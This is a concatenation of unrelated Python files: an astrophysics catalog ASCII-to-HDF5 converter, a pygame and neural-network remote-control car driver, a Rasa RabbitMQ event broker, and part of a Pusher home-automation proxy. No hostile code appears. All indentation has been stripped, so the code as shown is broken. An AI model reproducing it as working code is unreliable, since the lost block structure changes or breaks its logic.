hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_IDs",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_particles"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_particles"
else:
filename=basefilename+".sublevels"+".catalog_particles"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_particles"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_IDs",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
def ConvertASCIICatalogParticleTypeFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII catalog_parttypes file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading catalog_parttypes file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_parttypes"
if (iunbound>0): filename+=".unbound"
#load header
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename=basefilename+".catalog_parttypes"
if (iunbound>0): filename+=".unbound"
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_parttypes"
hdffilename=basefilename+".hdf.catalog_parttypes"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
else:
filename=basefilename+".catalog_parttypes"
hdffilename=basefilename+".hdf.catalog_parttypes"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
filename+="."+str(ifile)
hdffilename+="."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_Types",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_parttypes"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_parttypes"
else:
filename=basefilename+".sublevels"+".catalog_parttypes"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_parttypes"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_Types",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
def ConvertASCIIToHDF(basefilename,iseparatesubfiles=0,itype=0,iverbose=0):
ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles,iverbose)
ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleFileToHDF(basefilename,0,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleFileToHDF(basefilename,1,iseparatesubfiles,iverbose)
if (itype==1):
ConvertASCIICatalogParticleTypeFileToHDF(basefilename,0,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleTypeFileToHDF(basefilename,1,iseparatesubfiles,iverbose)
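#Example usage (the base filename is hypothetical): convert a full set of VELOCIraptor
#ASCII outputs, including the particle type files, to HDF5.
#    ConvertASCIIToHDF("snap_050.VELOCIraptor", iseparatesubfiles=0, itype=1, iverbose=1)
#This writes the corresponding *.hdf.properties, *.hdf.catalog_groups,
#*.hdf.catalog_particles(.unbound) and *.hdf.catalog_parttypes(.unbound) files.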
|
drive5.py
|
from __future__ import print_function
import pygame
import os, sys, time, shutil
from datetime import datetime
import select
import argparse
import urllib2
import subprocess
#import cv2
import numpy as np, pandas as pd
from PIL import ImageOps
from PIL import Image
from train4 import process_image, model
import logging
import threading
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')
NUM_CLASSES = 4
# delta_time = -200
delta_time = 1000
#Original Image size
oshapeX = 640
oshapeY = 480
#Orignal Multi size
moshapeX = 640 * 2
moshapeY = 480
#Scaled Image size
shapeX = 160
shapeY = 120
#Scaled Multi size
mshapeX = 320
mshapeY = 120
conf_level=0.3
# num_reqs = 10
# v_width = 16.
# v_length = 24.
# err_marrgin = 5
actions = [pygame.K_UP,pygame.K_LEFT,pygame.K_RIGHT,pygame.K_DOWN]
def init_sound():
sounds = {}
sounds['start'] = pygame.mixer.Sound('assets/sound/start_car.wav')
sounds['vroom'] = pygame.mixer.Sound('assets/sound/vroom_car.wav')
sounds['drive'] = pygame.mixer.Sound('assets/sound/drive_car.wav')
sounds['slow'] = pygame.mixer.Sound('assets/sound/slow_car.wav')
sounds['idle'] = pygame.mixer.Sound('assets/sound/idle_car.wav')
return sounds
def verify_args():
var = {}
# verify command line arguments
if os.path.exists(args.st_dir):
fetch_last_img = "ls " + args.st_dir + " | tail -n1"
var['fetch_last_img'] = fetch_last_img
else:
logging.error("Error: streaming directory %s does not exist" % args.st_dir)
exit(1)
if args.wheel:
# delta_time is a module-level setting, so declare it global before overriding it here
global delta_time
delta_time = -100
if args.multi:
dir_left = args.st_dir + "/left"
dir_right = args.st_dir + "/right"
var['dir_left'] = dir_left
var['dir_right'] = dir_right
if os.path.exists(dir_left) and os.path.exists(dir_right):
fetch_last_left = "ls " + dir_left + " | tail -n1"
fetch_last_right = "ls " + dir_right + " | tail -n1"
var['fetch_last_left'] = fetch_last_left
var['fetch_last_right'] = fetch_last_right
else:
logging.error("Error: streaming directory %s is not compatible\
for mulit-cam" % args.st_dir)
exit(1)
shape = (mshapeY, mshapeX, 3)
else:
shape = (shapeY, shapeX, 3)
auto = 0
if args.model:
ml_model = model(True, shape, tr_model=args.model)
auto = args.auto
else:
ml_model = None
auto = False
train = False
if args.train:
train = True
data_dir = "./model_data/"
var['data_dir'] = data_dir
if not args.multi:
img_dir = "./data_sets/" + args.train + "/data/"
var['img_dir'] = img_dir
else:
img_dir_left = "./data_sets/" + args.train + "/left/"
img_dir_right = "./data_sets/" + args.train + "/right/"
if not os.path.exists(img_dir_left):
os.makedirs(img_dir_left)
if not os.path.exists(img_dir_right):
os.makedirs(img_dir_right)
var['img_dir_left'] = img_dir_left
var['img_dir_right'] = img_dir_right
return var, ml_model, auto, train
def display_img():
ret_img = []
if not args.multi:
test = subprocess.check_output(var['fetch_last_img'], shell=True)
ret_img = [test]
img_name = args.st_dir + "/" + test.decode("utf-8").strip()
img = pygame.image.load(img_name)
if img:
img = pygame.transform.scale(img,(oshapeX,oshapeY))
screen.blit(img,(0,0))
pygame.display.flip()
return ret_img
else:
try:
img_left = subprocess.check_output(var['fetch_last_left'], shell=True)
img_right = subprocess.check_output(var['fetch_last_right'], shell=True)
img_left = var['dir_left'] + "/" + img_left.decode("utf-8").strip()
img_right = var['dir_right'] + "/" + img_right.decode("utf-8").strip()
ret_img = [img_left, img_right]
img_left = pygame.image.load(img_left)
img_right = pygame.image.load(img_right)
if img_left and img_right:
img_left = pygame.transform.scale(img_left,(oshapeX,oshapeY))
img_right = pygame.transform.scale(img_right,(oshapeX,oshapeY))
screen.blit(img_left,(0,0))
screen.blit(img_right,(oshapeX,0))
pygame.display.flip()
return ret_img
except:
pass
logging.error("error: couldn't get an image")
return None
def record_data(act_i, img):
logging.debug("Entering record_data %d %s" % (act_i, str(img)))
if act_i < 6:
ts = time.time()
st = datetime.fromtimestamp(ts).strftime('%Y%m%d-%H%M%S-%f')[:-4]
logging.debug(img)
new_names = [st + "_" + img_name.split("/")[-1] for img_name in img]
logging.debug(new_names)
sa_append = new_names + [act_i]
sa_lst.append(sa_append)
if args.multi:
# do left
shutil.copy(img[0], var['img_dir_left']+new_names[0])
# do right
shutil.copy(img[1], var['img_dir_right']+new_names[1])
else:
shutil.copy(img[0], var['img_dir']+new_names[0])
logging.debug("Exiting record_data %d %s" % (act_i, str(img)))
def engine(switch):
print(engine.drive)
startup = 0
if engine.drive == -1:
startup = 1
if switch != engine.drive:
engine.drive = switch
if engine.drive:
channel.play(sounds['vroom'], 0, 1000)
else:
if not startup:
channel.play(sounds['slow'], 0, 1000)
if engine.drive:
channel.queue(sounds['drive'])
else:
channel.queue(sounds['idle'])
def send_control(act_i, img):
global train, threads
try:
logging.info("Sending command %s" % links[act_i])
if not args.teach:
r = urllib2.urlopen(clinks[act_i], timeout=2)
if train and act_i < 6:
t = threading.Thread(target=record_data, args=(act_i,img))
t.setDaemon(True)
# threads.append(t)
t.start()
return 0
except:
logging.error("send_control: Command %s couldn't reach a vehicle" % clinks[act_i])
return -1
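# For reference, the command URLs built in __main__ have the form "<url><link>/exp<exp_time>/m<speed>";
# with the parser defaults below, the forward-left command resolves to
# "http://192.168.2.3/fwd/lf/exp250/m250".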
def manual_drive_ext(img,intent):
for act_i in range(len(actions)):
tmp = actions[act_i]
if tmp==intent:
logging.debug("acting out %d" % tmp)
res = send_control(act_i, img)
return
def manual_drive(img, keys, wheel):
try:
r = urllib2.urlopen(args.url+wheel, timeout=2)
if links[0] in wheel or links[3] in wheel:
engine(1)
except:
logging.error("Error: wheel command failed.")
# for act_i in range(len(links)):
# if links[act_i] == wheel:
# res = send_control(act_i, img)
# return
def reverse_motion():
# NOTE: this helper is currently unused and originally referenced undefined names.
# The forward/reverse pairing assumed here (index+3 mod 6) maps the /fwd* links onto /rev* in `links`.
last_command = sa_lst[-1][-1]
inv_command = (last_command + 3) % 6
logging.info("Sending command %s" % links[inv_command])
send_control(inv_command, None)
def emergency_reverse():
logging.info("Sending command %s" % links[3])
try:
r = urllib2.urlopen(clinks[3], timeout=2)
except:
logging.error("emergency_reverse: Command %s couldn't reach a vehicle" % clinks[3])
def auto_drive(img):
if img:
md_img, _ = process_image(img, None, False, args.multi, shape=(shapeY,shapeX))
pred_act = model.predict(np.array([md_img]))[0]
logging.info("Lft: %.2f | Fwd: %.2f | Rht: %.2f | Rev: %.2f" %
(pred_act[1], pred_act[0], pred_act[2], pred_act[3]))
act_i = np.argmax(pred_act)
if (pred_act[act_i]<conf_level): emergency_reverse()
else: send_control(act_i, img)
return pred_act, act_i
else:
logging.error("Error: no image for prediction")
return None, None
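# Example of the confidence gate above: with conf_level=0.3 and a prediction such as
# [0.28, 0.26, 0.24, 0.22], no action reaches the threshold, so emergency_reverse()
# is triggered instead of sending the predicted command.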
def drive(auto):
intent=0
ot = 0
img = None
drive = False
logging.debug("before thread")
while True:
ct = time.time()
drive = True if (ct - ot) * 1000 > exp_time + delta_time else drive
keys = pygame.key.get_pressed()
for act_i in range(len(actions)):
tmp = actions[act_i]
if keys[tmp]:
logging.debug("Key pressed %d" % tmp)
intent=tmp
if args.wheel:
wheel = subprocess.check_output("humancontrol/wheeltest")
else:
wheel = ''
if keys[pygame.K_ESCAPE] or keys[pygame.K_q] or \
pygame.event.peek(pygame.QUIT):
logging.debug("Exit pressed")
return
if drive and not auto:
logging.debug("Drive")
drive = False
if not wheel:
if args.wheel:
engine(0)
manual_drive_ext(img,intent)
intent=0
else:
manual_drive(img,keys, wheel)
ot = ct
if keys[pygame.K_a]:
auto = True
logging.info("Autopilot mode on!")
if keys[pygame.K_s]:
auto = False
logging.info("Autopilot mode off!")
keys=[]
pygame.event.pump()
img = display_img()
logging.debug("Calling display_img()")
logging.debug(img)
# If drive windows is open and currently autopilot mode is on
if auto and drive and img:
logging.debug("Calling model prediction")
drive = False
pred_act, act_i = auto_drive(img)
ot = ct
def build_parser():
parser = argparse.ArgumentParser(description='Driver')
parser.add_argument(
'-model',
type=str,
default='',
help='Path to model h5 file. Model should be on the same path.'
)
parser.add_argument(
'-auto',
action='store_true',
default=False,
help='Autopilot mode on/off. Default: off'
)
parser.add_argument(
'-multi',
action='store_true',
default=False,
help='Set multi cam on/off. Default: off'
)
parser.add_argument(
'-url',
type=str,
help='Url for connection. Default: http://192.168.2.3',
default="http://192.168.2.3"
)
parser.add_argument(
'-st_dir',
type=str,
help='Img stream directory. Default: st_dir',
default="st_dir"
)
parser.add_argument(
'-exp_time',
type=int,
help='Command expiration time. Default: 250ms',
default=250
)
parser.add_argument(
'-speed',
type=int,
help='Command motor power. Default: 250',
default=250
)
parser.add_argument(
'-train',
type=str,
help='Name of the training set. Default: none',
default=""
)
parser.add_argument(
'-teach',
action='store_true',
default=False,
help='Set teach mode on/off if train flag is enabled. Default: off'
)
parser.add_argument(
'-wheel',
action='store_true',
default=False,
help="Set wheel controls on/off. Default: off"
)
return parser
if __name__ == "__main__":
parser = build_parser()
args = parser.parse_args()
var, model, auto, train = verify_args()
links = ['/fwd', '/fwd/lf', '/fwd/rt', '/rev', '/rev/lf', '/rev/rt', '']
clinks = [args.url + el +'/exp' + str(args.exp_time) + '/m'+str(args.speed) for el in links]
sa_lst = []
threads = []
#Car Startup sound
if args.wheel:
pygame.mixer.init()
sounds = init_sound()
channel = pygame.mixer.Channel(0)
channel.play(sounds['start'], 0, 4500)
#pygame.time.wait(4500)
engine.drive = -1
engine(0)
pygame.init()
#check car response
exp_time = args.exp_time
if send_control(6, None):
logging.info("Exiting")
pygame.quit()
exit(0)
if not args.multi:
size = (oshapeX,oshapeY)
else:
size = (moshapeX, moshapeY)
screen = pygame.display.set_mode(size)
logging.info("Fully initialized. Ready to drive")
drive(auto)
logging.info("Done driving")
# for t in threads:
# t.join()
if train:
if args.multi:
column = ["img_left", "img_right", "command"]
else:
column = ["img_name", "command"]
df = pd.DataFrame(sa_lst, columns=column)
df.to_csv(var['data_dir'] + args.train + "_log.csv", index=False)
pygame.quit()
|
pika.py
|
import json
import logging
import typing
import os
import warnings
from collections import deque
from threading import Thread
from typing import Dict, Optional, Text, Union, Deque, Callable
import time
from rasa.constants import ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
from rasa.core.brokers.broker import EventBroker
from rasa.utils.endpoints import EndpointConfig
from rasa.utils.io import DEFAULT_ENCODING
if typing.TYPE_CHECKING:
from pika.adapters.blocking_connection import BlockingChannel
from pika import SelectConnection, BlockingConnection, BasicProperties
from pika.channel import Channel
import pika
from pika.connection import Parameters, Connection
logger = logging.getLogger(__name__)
def initialise_pika_connection(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: Union[int, float] = 5,
) -> "BlockingConnection":
"""Create a Pika `BlockingConnection`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
Pika `BlockingConnection` with provided parameters
"""
import pika
parameters = _get_pika_parameters(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return pika.BlockingConnection(parameters)
def _get_pika_parameters(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: Union[int, float] = 5,
) -> "Parameters":
"""Create Pika `Parameters`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
Pika `Parameters` which can be used to create a new connection to a broker.
"""
import pika
if host.startswith("amqp"):
# user supplied an AMQP URL containing all the info
parameters = pika.URLParameters(host)
parameters.connection_attempts = connection_attempts
parameters.retry_delay = retry_delay_in_seconds
if username:
parameters.credentials = pika.PlainCredentials(username, password)
else:
# host seems to be just the host, so we use our parameters
parameters = pika.ConnectionParameters(
host,
port=port,
credentials=pika.PlainCredentials(username, password),
connection_attempts=connection_attempts,
# Wait between retries since
# it can take some time until
# RabbitMQ comes up.
retry_delay=retry_delay_in_seconds,
ssl_options=create_rabbitmq_ssl_options(host),
)
return parameters
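# Illustrative examples (hosts and credentials are placeholders):
#   _get_pika_parameters("amqp://user:pass@broker.example.com", "user", "pass")
#       -> pika.URLParameters built from the AMQP URL, credentials overridden by the explicit ones
#   _get_pika_parameters("broker.example.com", "user", "pass", port=5672)
#       -> pika.ConnectionParameters with PlainCredentials and optional SSL options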
def initialise_pika_select_connection(
parameters: "Parameters",
on_open_callback: Callable[["SelectConnection"], None],
on_open_error_callback: Callable[["SelectConnection", Text], None],
) -> "SelectConnection":
"""Create a non-blocking Pika `SelectConnection`.
Args:
parameters: Parameters which should be used to connect.
on_open_callback: Callback which is called when the connection was established.
on_open_error_callback: Callback which is called when connecting to the broker
failed.
Returns:
A callback-based connection to the RabbitMQ event broker.
"""
import pika
return pika.SelectConnection(
parameters,
on_open_callback=on_open_callback,
on_open_error_callback=on_open_error_callback,
)
def initialise_pika_channel(
host: Text,
queue: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: Union[int, float] = 5,
) -> "BlockingChannel":
"""Initialise a Pika channel with a durable queue.
Args:
host: Pika host.
queue: Pika queue to declare.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
connection_attempts: Number of channel attempts before giving up.
retry_delay_in_seconds: Delay in seconds between channel attempts.
Returns:
Pika `BlockingChannel` with declared queue.
"""
connection = initialise_pika_connection(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return _declare_pika_channel_with_queue(connection, queue)
def _declare_pika_channel_with_queue(
connection: "BlockingConnection", queue: Text
) -> "BlockingChannel":
"""Declare a durable queue on Pika channel."""
channel = connection.channel()
channel.queue_declare(queue, durable=True)
return channel
def close_pika_channel(channel: "Channel") -> None:
"""Attempt to close Pika channel."""
from pika.exceptions import AMQPError
try:
channel.close()
logger.debug("Successfully closed Pika channel.")
except AMQPError:
logger.exception("Failed to close Pika channel.")
def close_pika_connection(connection: "Connection") -> None:
"""Attempt to close Pika connection."""
from pika.exceptions import AMQPError
try:
connection.close()
logger.debug("Successfully closed Pika connection with host.")
except AMQPError:
logger.exception("Failed to close Pika connection with host.")
class PikaEventBroker(EventBroker):
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queue: Text = "rasa_core_events",
loglevel: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
):
"""RabbitMQ event producer.
Args:
host: Pika host.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
queue: Pika queue to declare.
loglevel: Logging level.
"""
logging.getLogger("pika").setLevel(loglevel)
self.queue = queue
self.host = host
self.username = username
self.password = password
self.port = port
self.channel: Optional["Channel"] = None
# Deque to store unpublished messages which hopefully will be published later
self._unpublished_messages: Deque[Text] = deque()
self._run_pika()
def __del__(self) -> None:
if self.channel:
close_pika_channel(self.channel)
close_pika_connection(self.channel.connection)
@property
def rasa_environment(self) -> Optional[Text]:
return os.environ.get("RASA_ENVIRONMENT")
@classmethod
def from_endpoint_config(
cls, broker_config: Optional["EndpointConfig"]
) -> Optional["PikaEventBroker"]:
if broker_config is None:
return None
return cls(broker_config.url, **broker_config.kwargs)
def _run_pika(self) -> None:
parameters = _get_pika_parameters(
self.host, self.username, self.password, self.port
)
self._pika_connection = initialise_pika_select_connection(
parameters, self._on_open_connection, self._on_open_connection_error
)
# Run Pika io loop in extra thread so it's not blocking
self._run_pika_io_loop_in_thread()
def _on_open_connection(self, connection: "SelectConnection") -> None:
logger.debug(f"RabbitMQ connection to '{self.host}' was established.")
connection.channel(on_open_callback=self._on_channel_open)
def _on_open_connection_error(self, _, error: Text) -> None:
logger.warning(
f"Connecting to '{self.host}' failed with error '{error}'. Trying again."
)
def _on_channel_open(self, channel: "Channel") -> None:
logger.debug("RabbitMQ channel was opened.")
channel.queue_declare(self.queue, durable=True)
self.channel = channel
while self._unpublished_messages:
# Send unpublished messages
message = self._unpublished_messages.popleft()
self._publish(message)
logger.debug(
f"Published message from queue of unpublished messages. "
f"Remaining unpublished messages: {len(self._unpublished_messages)}."
)
def _run_pika_io_loop_in_thread(self) -> None:
thread = Thread(target=self._run_pika_io_loop, daemon=True)
thread.start()
def _run_pika_io_loop(self) -> None:
self._pika_connection.ioloop.start()
def publish(
self, event: Dict, retries: int = 60, retry_delay_in_seconds: int = 5
) -> None:
"""Publish `event` into Pika queue.
Perform `retries` publish attempts with `retry_delay_in_seconds` between them.
"""
body = json.dumps(event)
while retries:
try:
self._publish(body)
return
except Exception as e:
logger.error(
"Could not open Pika channel at host '{}'. Failed with error: "
"{}".format(self.host, e)
)
self.channel = None
retries -= 1
time.sleep(retry_delay_in_seconds)
logger.error(
"Failed to publish Pika event to queue '{}' on host "
"'{}':\n{}".format(self.queue, self.host, body)
)
@property
def _message_properties(self) -> "BasicProperties":
"""Create RabbitMQ message properties.
Returns:
pika.spec.BasicProperties with the `RASA_ENVIRONMENT` environment
variable as the properties' `app_id` value. If this variable is unset, empty
pika.spec.BasicProperties.
"""
from pika.spec import BasicProperties
kwargs = {"app_id": self.rasa_environment} if self.rasa_environment else {}
return BasicProperties(**kwargs)
def _publish(self, body: Text) -> None:
if self._pika_connection.is_closed:
# Try to reset connection
self._run_pika()
elif not self.channel:
logger.warning(
f"RabbitMQ channel has not been assigned. Adding message to "
f"list of unpublished messages and trying to publish them "
f"later. Current number of unpublished messages is "
f"{len(self._unpublished_messages)}."
)
self._unpublished_messages.append(body)
else:
self.channel.basic_publish(
"",
self.queue,
body.encode(DEFAULT_ENCODING),
properties=self._message_properties,
)
logger.debug(
f"Published Pika events to queue '{self.queue}' on host "
f"'{self.host}':\n{body}"
)
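# Minimal usage sketch (host, credentials and the event dict are placeholder values):
#   broker = PikaEventBroker("localhost", "guest", "guest", queue="rasa_core_events")
#   broker.publish({"event": "user", "text": "hello"})
# The event is serialised to JSON and published to the declared queue once the channel is open.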
def create_rabbitmq_ssl_options(
rabbitmq_host: Optional[Text] = None,
) -> Optional["pika.SSLOptions"]:
"""Create RabbitMQ SSL options.
Requires the following environment variables to be set:
RABBITMQ_SSL_CLIENT_CERTIFICATE - path to the SSL client certificate (required)
RABBITMQ_SSL_CLIENT_KEY - path to the SSL client key (required)
RABBITMQ_SSL_CA_FILE - path to the SSL CA file for verification (optional)
RABBITMQ_SSL_KEY_PASSWORD - SSL private key password (optional)
Details on how to enable RabbitMQ TLS support can be found here:
https://www.rabbitmq.com/ssl.html#enabling-tls
Args:
rabbitmq_host: RabbitMQ hostname
Returns:
Pika SSL context of type `pika.SSLOptions` if
the RABBITMQ_SSL_CLIENT_CERTIFICATE and RABBITMQ_SSL_CLIENT_KEY
environment variables are valid paths, else `None`.
"""
client_certificate_path = os.environ.get("RABBITMQ_SSL_CLIENT_CERTIFICATE")
client_key_path = os.environ.get("RABBITMQ_SSL_CLIENT_KEY")
if client_certificate_path and client_key_path:
import pika
import rasa.server
logger.debug(f"Configuring SSL context for RabbitMQ host '{rabbitmq_host}'.")
ca_file_path = os.environ.get("RABBITMQ_SSL_CA_FILE")
key_password = os.environ.get("RABBITMQ_SSL_KEY_PASSWORD")
ssl_context = rasa.server.create_ssl_context(
client_certificate_path, client_key_path, ca_file_path, key_password
)
return pika.SSLOptions(ssl_context, rabbitmq_host)
else:
return None
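# Example configuration (paths are hypothetical) under which the function above returns
# pika.SSLOptions instead of None:
#   os.environ["RABBITMQ_SSL_CLIENT_CERTIFICATE"] = "/etc/certs/client.pem"
#   os.environ["RABBITMQ_SSL_CLIENT_KEY"] = "/etc/certs/client.key"
#   # optionally RABBITMQ_SSL_CA_FILE and RABBITMQ_SSL_KEY_PASSWORD may also be set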
class PikaProducer(PikaEventBroker):
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queue: Text = "rasa_core_events",
loglevel: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
):
warnings.warn(
"The `PikaProducer` class is deprecated, please inherit "
"from `PikaEventBroker` instead. `PikaProducer` will be "
"removed in future Rasa versions.",
DeprecationWarning,
stacklevel=2,
)
super(PikaProducer, self).__init__(
host, username, password, port, queue, loglevel
)
|
pushrpc.py
|
"""Pusher intergration for messages from the cloud."""
import json
import logging
import Queue
import sys
import threading
import uuid
from pusherclient import Pusher
import requests
import websocket
from common import public_creds
from pi import simple_pusher
CONFIG_FILE = 'proxy.cfg'
APPENGINE_ADDRESS = 'https://%s.appspot.com' % public_creds.appengine_app_id
LOCAL_ADDRESS = 'http://localhost:8080'
EVENT_PATH = '/api/device/events'
AUTH_PATH = '/api/proxy/channel_auth'
def read_or_make_config():
"""Read proxy id and secret from file, or make new one."""
try:
with open(CONFIG_FILE) as config_file:
return config_file.read().split(',')
except:
proxy_id = str(uuid.uuid4().get_hex())
proxy_secret = str(uuid.uuid4().get_hex())
with open(CONFIG_FILE, 'w') as config_file:
config_file.write('%s,%s' % (proxy_id, proxy_secret))
return (proxy_id, proxy_secret)
class PushRPC(object):
"""Wrapper for pusher integration."""
# pylint: disable=too-many-instance-attributes
def __init__(self, callback, args):
self._proxy_id, self._proxy_secret = read_or_make_config()
logging.info('I am proxy \'%s\'', self._proxy_id)
self._args = args
self._exiting = False
self._events = Queue.Queue()
self._events_thread = threading.Thread(target=self._post_events_loop)
self._events_thread.daemon = True
self._events_thread.start()
self._callback = callback
if args.local:
self._websocket_connection = None
self._websocket_thread = threading.Thread(target=self._local_websocket)
self._websocket_thread.start()
else:
self._pusher = Pusher(public_creds.pusher_key,
auth_callback=self._pusher_auth_callback,
log_level=logging.ERROR)
self._pusher.connection.bind(
'pusher:connection_established',
self._connect_handler)
self._pusher.connect()
def _local_websocket(self):
"""Connect to local websocket server."""
self._websocket_connection = websocket.create_connection(
"ws://localhost:%d/" % simple_pusher.WEBSOCKET_PORT)
request = json.dumps({'channel': 'private-%s' % self._proxy_id})
self._websocket_connection.send(request)
while True:
result = self._websocket_connection.recv()
self._callback_handler(result)
def _pusher_auth_callback(self, socket_id, channel_name):
params = {'socket_id': socket_id, 'channel_name': channel_name}
response = self._make_request(APPENGINE_ADDRESS, AUTH_PATH, params=params)
response = response.json()
return response['auth']
def _make_request(self, server, path, method='GET', **kwargs):
"""Make a request to the server with this proxy's auth."""
response = requests.request(
method, server + path,
auth=(self._proxy_id, self._proxy_secret),
headers={'content-type': 'application/json',
'awesomation-proxy': 'true'},
**kwargs)
response.raise_for_status()
return response
def _connect_handler(self, _):
channel_name = 'private-%s' % self._proxy_id
channel = self._pusher.subscribe(channel_name)
channel.bind('events', self._callback_handler)
def _callback_handler(self, data):
"""Callback for when messages are recieved from pusher."""
try:
events = json.loads(data)
except ValueError:
logging.error('Error parsing message', exc_info=sys.exc_info())
return
# pylint: disable=broad-except
try:
self._callback(events)
except Exception:
logging.error('Error running push callback', exc_info=sys.exc_info())
def send_event(self, event):
self._events.put(event)
def _get_batch_of_events(self, max_size=20):
"""Retrieve as many events from queue as possible without blocking."""
events = []
while len(events) < max_size:
try:
# First time round we should wait (when list is empty)
block = len(events) == 0
event = self._events.get(block)
# To break out of this thread, we inject a None event in stop()
if event is None:
return None
events.append(event)
except Queue.Empty:
break
assert events
return events
def _post_events_loop(self):
"""Send batched of events to server in a loop."""
logging.info('Starting events thread.')
while not self._exiting:
events = self._get_batch_of_events()
if events is None:
break
# pylint: disable=broad-except
try:
self._post_events_once(events)
except Exception:
logging.error('Exception sending events to server',
exc_info=sys.exc_info())
logging.info('Exiting events thread.')
def _post_events_once(self, events):
"""Send list of events to server."""
logging.info('Posting %d events to server', len(events))
try:
server_address = LOCAL_ADDRESS if self._args.local else APPENGINE_ADDRESS
self._make_request(server_address, EVENT_PATH,
method='POST', data=json.dumps(events))
except:
logging.error('Posting events failed', exc_info=sys.exc_info())
def stop(self):
